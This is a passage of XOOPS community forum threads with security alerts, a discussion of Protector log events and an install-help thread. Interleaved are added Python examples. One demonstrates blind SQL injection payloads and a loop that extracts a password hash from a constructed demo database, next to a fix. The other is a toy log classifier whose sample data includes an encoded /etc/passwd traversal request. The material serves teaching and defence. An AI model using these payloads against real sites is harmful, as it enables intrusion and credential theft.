Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 12:51:34
  • Tom

Ah, thanks for that Shine.

I was worried for a while there, as I mentioned I've got many sites running on the latest X and with DJ's article module.

Thanks again

Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 4:38:20
  • Shine

I am quite sure this vulnerability concerns the module: articleS 1.03 from AndyM.
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2

The alert says:
Xoops All Version -(module)Articles- (file)Article.PHP
modules/articles/article.php

So this does NOT concern DJ's article module.

Environment:
PHP Version 5.2.4
SQL: 5.0.77
Zend: v2.2.0
Apache: 1.3.39


Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

  • 2008/4/24 3:32:38
  • Tom

I hope this vulnerability isn't in the X core as well as the module, as I've got many sites running on the latest versions of XOOPS.

Perhaps it could be the other article module?





Re: [Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

Could be - wasn't sure if it was "article" or "articles".







[Security Alert] - XOOPS Article Module 'article.php' SQL Injection Vulnerability

XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

Source: http://www.securityfocus.com/bid/28879/references

Giba


[Security Alert] - XOOPS Recette 'detail.php' SQL Injection Vulnerability

XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Recette 2.2 is vulnerable to this issue; other versions may also be affected.

Quote:


Bugtraq ID: 28859
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Apr 19 2008 12:00AM
Updated: Apr 21 2008 06:17PM
Credit: S@BUN
Vulnerable: Xoops Recette 2.2



Source: http://www.securityfocus.com/bid/28859/references

Giba
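Both alerts above describe the same defect class: a numeric request parameter (the article or recipe id) is concatenated into a query, which gives an attacker a true/false oracle even though the page never echoes SQL errors or data. The following is an added example and not code from the articles module, Recette or XOOPS: a Python/sqlite3 lookup stands in for the PHP handler, the tables, columns and the 'admin' row are constructed for the demonstration, and the hardened version shows the fix (cast to integer, then bind the value) against which the same payloads fail.

```python
"""Blind SQL injection through an integer id parameter, and the fix.

Added illustration, not the module's code: a Python/sqlite3 lookup stands in
for a PHP article.php?id=... handler. Table, column and row contents are
constructed for the demo.
"""
import sqlite3


def make_db():
    # Constructed sample schema: one public content table, one sensitive table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "Hello world", 1), (2, "Unpublished draft", 0)])
    conn.execute("CREATE TABLE users (uid INTEGER, uname TEXT, pwd_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'secret-hash')")
    return conn


def vulnerable_lookup(conn, raw_id):
    """Interpolates the raw request parameter into SQL (the unsanitized pattern)."""
    sql = "SELECT title FROM articles WHERE id=" + raw_id + " AND published=1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def hardened_lookup(conn, raw_id):
    """Type-validate first (what intval() does in PHP), then bind as a parameter."""
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT title FROM articles WHERE id=? AND published=1", (article_id,)
    ).fetchone()
    return row[0] if row else None


def blind_extract(conn, lookup, table, column, where, max_len=32):
    """Recover one field through the page's true/false behaviour only.

    The page shows the article when the injected condition is true and
    nothing when it is false; no SQL error or data is ever echoed, which is
    what makes the injection 'blind'. One request per candidate character.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):
            payload = (
                f"1 AND (SELECT unicode(substr({column},{pos},1)) "
                f"FROM {table} WHERE {where})={code}"
            )
            if lookup(conn, payload) is not None:
                matched = chr(code)
                break
        if matched is None:      # substr() past the end yields NULL: no code matches
            break
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1 AND 1=1"), vulnerable_lookup(db, "1 AND 1=2"))
    print("leaked:", blind_extract(db, vulnerable_lookup, "users", "pwd_hash", "uname='admin'"))
    print("hardened:", repr(blind_extract(db, hardened_lookup, "users", "pwd_hash", "uname='admin'")))
```

The point of the extraction loop is that the attacker needs only the difference between "article shown" and "article not shown"; Protector's log would show the run of near-identical requests with growing `AND (SELECT ...)` clauses, which is also what to look for in the web server access log.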


Re: Protector log

I'm seeing a lot of stuff similar to the above and more in protector logs across a couple of sites, starting from 12 April. Anyone finding stuff like this in their logs? (see picture, Protector won't let me post all the bad stuff here :)


Attachment: protector-log-messages.png



Re: Protector log

Quote:
I mean this one because I've never seen it in Protector. At the end of the log there is a pwd!
Does this mean that the attacker has access to my site?

It's unlikely; if Protector logged it, it probably prevented it. And if he had retrieved that password from that directory traversal, it would not be the password to your website, but more than likely a password for a user account on the server such as root etc., which I think the server security would prevent too.

Live as if you were to die tomorrow, Learn as if you were to live forever

The beauty of a living thing is not the atoms that go into it, but the way those atoms are put together!


Re: Protector log

The DoS report might not be malicious. Bear that in mind :)

You can get a log of a DoS attack with Protector when you are refreshing the page too many times, or if you get your password wrong and post again too quickly; it can log it as a DoS event. But that's not a reason to dismiss the DoS. It's advisable to still investigate the source IP of the log entry to determine if it was an intentional DoS attack or just an overzealous user.

You'll do better checking the server logs and comparing them to the Protector logs. It's more likely that a proper malicious DoS attack would be detected and stopped by the server's firewall.



Re: Protector log

Quote:
skenow wrote:
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable

I mean this one because I've never seen it in Protector. At the end of the log there is a pwd!
Does this mean that the attacker has access to my site?



Re: Protector log

You have several different events, each with different severities -

CRAWLER - often a result of search bots crawling and indexing your site, but also can be someone copying your site. I often see this associated with Firefox users because FF has a prefetch 'feature' that scans the current page for links and begins to cache the linked pages.

DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable

URI SPAM - The usual suspects - spammers trying to get their links on your site. The SPAM POINTS are the number of urls in the POST

DoS (denial of service) - flooding the server with requests in an attempt to bring it down, making your site inaccessible. Wikipedia: Denial of Service
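To make the four event classes above concrete, here is an added example that is not Protector's own code or rule set: a small classifier with assumed thresholds run over constructed sample requests. The record layout, the thresholds, the regexes and the sample IPs and URIs are all assumptions for illustration; Protector's real checks are more involved, and the crawler rule here is only a user-agent hint, whereas the post above notes that real crawler events are mostly about request patterns (including Firefox prefetch).

```python
"""Toy classifier for the Protector log event classes described above.

Added example, not Protector's code: the record layout, thresholds, regexes
and sample requests are constructed for illustration.
"""
import re
from collections import defaultdict, deque
from urllib.parse import unquote

URL_RE = re.compile(r"https?://", re.IGNORECASE)
BOT_UA_RE = re.compile(r"bot|spider|crawl", re.IGNORECASE)

DOS_MAX_HITS = 10     # more than this many requests from one IP ...
DOS_WINDOW = 5.0      # ... inside this many seconds is flagged as DoS (assumed threshold)
SPAM_MIN_POINTS = 3   # one "spam point" per URL in the POST body (assumed threshold)


def fully_decode(s, rounds=3):
    """URL-decode repeatedly so double-encoded ../ (%252e%252e%252f) is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_traversal(uri):
    """True when any path or query segment is exactly '..' after decoding."""
    normalized = fully_decode(uri).replace("\\", "/")
    return any(seg == ".." for seg in re.split(r"[/?=&]", normalized))


def spam_points(body):
    """Count URLs in a POST body, the way the URI SPAM score is described."""
    return len(URL_RE.findall(body or ""))


class Classifier:
    def __init__(self):
        self.hits = defaultdict(deque)   # ip -> timestamps inside the DoS window

    def classify(self, req):
        events = []
        if is_traversal(req["uri"]):
            events.append("DIRECTORY TRAVERSAL")
        if req["method"] == "POST" and spam_points(req.get("body")) >= SPAM_MIN_POINTS:
            events.append("URI SPAM")
        window = self.hits[req["ip"]]
        window.append(req["ts"])
        while window and window[0] < req["ts"] - DOS_WINDOW:
            window.popleft()
        if len(window) > DOS_MAX_HITS:
            events.append("DoS")
        elif BOT_UA_RE.search(req.get("ua", "")):
            events.append("CRAWLER")   # a UA hint only; real crawler detection is rate-based
        return events


# Constructed sample traffic (RFC 5737 documentation addresses).
SAMPLE = [
    {"ip": "203.0.113.5", "ts": 0.0, "method": "GET",
     "uri": "/modules/articles/article.php?id=1", "ua": "Mozilla/5.0"},
    {"ip": "203.0.113.9", "ts": 1.0, "method": "GET",
     "uri": "/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "ua": "Mozilla/5.0"},
    {"ip": "198.51.100.7", "ts": 2.0, "method": "POST", "uri": "/modules/newbb/post.php",
     "body": "cheap pills http://a.example/ http://b.example/ http://c.example/", "ua": "Mozilla/5.0"},
    {"ip": "192.0.2.44", "ts": 3.0, "method": "GET", "uri": "/", "ua": "Googlebot/2.1"},
] + [
    {"ip": "198.51.100.200", "ts": 4.0 + i * 0.1, "method": "GET",
     "uri": "/index.php", "ua": "Mozilla/5.0"} for i in range(12)
]


def run(requests):
    """Classify each request in order; returns (ip, events) per request."""
    clf = Classifier()
    return [(r["ip"], clf.classify(r)) for r in requests]


if __name__ == "__main__":
    for ip, events in run(SAMPLE):
        if events:
            print(ip, events)
```

The DoS rule is the one most prone to the false positives discussed in this thread: a user hammering reload trips the same sliding window as a flood, which is why the source IP in the Protector entry should be compared against the web server's own access log before drawing conclusions.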



Protector log

Hi, today I found a log entry in Protector that I didn't understand. Is it harmful?
i've attached a screenshot


Attachment: protector.png



[Security Alert] - ImageMagick XGetPixel/XInitImage Multiple Integer Overflow Vulnerabilities

Reported by: SecurityFocus

ImageMagick is prone to multiple integer-overflow vulnerabilities because it fails to properly validate user-supplied data.

An attacker can exploit these issues to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.



Vulnerable: XFree86 X11R6 4.3.0.2
XFree86 X11R6 4.3.0.1
XFree86 X11R6 4.3.0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ MandrakeSoft Linux Mandrake 9.2 amd64
+ MandrakeSoft Linux Mandrake 9.2
+ MandrakeSoft Linux Mandrake 9.1 ppc
+ MandrakeSoft Linux Mandrake 9.1
+ RedHat Fedora Core1
+ RedHat Linux 9.0 i386
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
+ Turbolinux Turbolinux Desktop 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
X.org X11R7 1.1.1
X.org libx11 1.0
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Turbolinux wizpy 0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
TurboLinux Personal
TurboLinux Multimedia
Turbolinux FUJI 0
TransSoft Broker FTP Server 8.0
Sun Solaris 10.0 _x86
Sun Solaris 10.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SUSE Linux Enterprise Server 9 SP3
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. SLE SDK 9
S.u.S.E. SLE SDK 10
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 10.2 x86_64
S.u.S.E. Linux Professional 10.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 10.2 x86_64
S.u.S.E. Linux Personal 10.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server SDK 9
S.u.S.E. Linux Enterprise Server 9-SP3
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise Server 10
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise SDK 10
S.u.S.E. Linux Desktop 10
S.u.S.E. Linux 9.3 x86-64
S.u.S.E. Linux 9.3 x86
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
S.u.S.E. Linux 10.0 x86-64
S.u.S.E. Linux 10.0 x86
S.u.S.E. Linux 10.0 ppc
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Pardus Linux 2007.1
OpenBSD OpenBSD 4.0
OpenBSD OpenBSD 3.9
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ImageMagick ImageMagick 6.3.3-3
ImageMagick ImageMagick 6.3.2
ImageMagick ImageMagick 6.3.1
ImageMagick ImageMagick 6.2.9
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking
Avaya Interactive Response 1.3
Avaya Interactive Response 2.0
Avaya Integrated Management 2.1
Avaya Integrated Management
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 14.0
Avaya CMS Server 13.1
Apple Safari 3.0.3
Apple Safari 3.0.2 Beta for Windows
Apple Safari 3.0.1 Beta for Windows
Apple Safari 3 Beta for Windows

Giba


Re: Install page wont go away

  • 2008/4/8 15:13:37
  • Tom

There were no real issues from my side. I re-uploaded all the files to ensure they were done correctly, then installed it again and it worked straight out of the box.

The mainfile.php originally showed as being blank before I installed.

I believe taritrott is using some kind of web browser FTP; not sure if this caused some complications.

There was also another folder with ImpressCMS in it, which was not the web root (one above). It's possible he could have been uploading there rather than to the web root where the main ImpressCMS was to be.



Re: Install page wont go away

Thanks Tom,

What was the problem? How can we improve our installation script to avoid this kind of problem?

Marc-André Lanciault
Founder and CEO INBOX International inc.
Co-Founder ImpressCMS


Re: Install page wont go away

Thank you Tom.

If there's any feedback you can give us to improve things, please do.